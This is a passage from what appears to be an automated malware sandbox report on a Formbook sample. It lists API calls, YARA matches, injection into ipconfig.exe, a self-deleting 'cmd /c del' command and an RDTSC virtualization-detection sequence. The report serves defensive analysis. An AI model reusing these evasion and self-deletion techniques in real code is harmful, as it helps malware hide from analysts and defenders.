          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A995D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A998A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A9B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A999D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A99A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EB81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EB8280 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EB8300 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EB8222 NtCreateFile,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_0040102E
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_0041B8FB
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00408C6C
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00408C70
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_0041B57A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00402D88
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_0041C58A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00B220A8
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A6B090
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00B11002
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A74120
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00A5F900
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035EEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035D6E30
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_03681D55
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035BF900
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035B0D20
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035CD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035C841F
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_03671002
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035CB090
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EBB8FB
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EA8C6C
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EA8C70
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EBC58A
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EA2D88
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EA2D90
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EBB57A
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EA2FB0
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: String function: 035BB150 appears 35 times
          Source: v8kZUFgdD4.exe, 00000000.00000003.333171421.0000000002486000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe, 00000001.00000002.389800702.000000000060E000.00000004.00000020.sdmp; Binary or memory string: OriginalFilenameipconfig.exej% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe, 00000001.00000002.390529849.0000000000CDF000.00000040.00000001.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine; Classification label: mal100.troj.evad.winEXE@7/0@16/8
          Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: v8kZUFgdD4.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe; File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe; File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\ipconfig.exe; File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\ipconfig.exe; File read: C:\Windows\System32\drivers\etc\hosts
          Source: v8kZUFgdD4.exe; Virustotal: Detection: 38%
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; File read: C:\Users\user\Desktop\v8kZUFgdD4.exe
          Source: unknown; Process created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Process created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Process created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\explorer.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: Binary string: ipconfig.pdb source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: v8kZUFgdD4.exe, 00000000.00000003.338578386.0000000002500000.00000004.00000001.sdmp, v8kZUFgdD4.exe, 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, ipconfig.exe, 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: v8kZUFgdD4.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Unpacked PE file: 1.2.v8kZUFgdD4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 0_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_004062F6 pushfd ; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_004153FC push eax; retf
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00415CE7 pushad ; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00414D71 push ss; iretd
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00415D38 pushad ; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00AAD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_0360D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EA62F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EB53FC push eax; retf
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EBB3C5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EBC4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EB5CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EBB47C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EBB41B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EBB412 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EB4D71 push ss; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 7_2_00EB5D38 pushad ; ret

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000EA85F4 second address: 0000000000EA85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000EA898E second address: 0000000000EA8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 1536Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6904Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.359549772.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.359510454.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.359944939.000000000868E000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
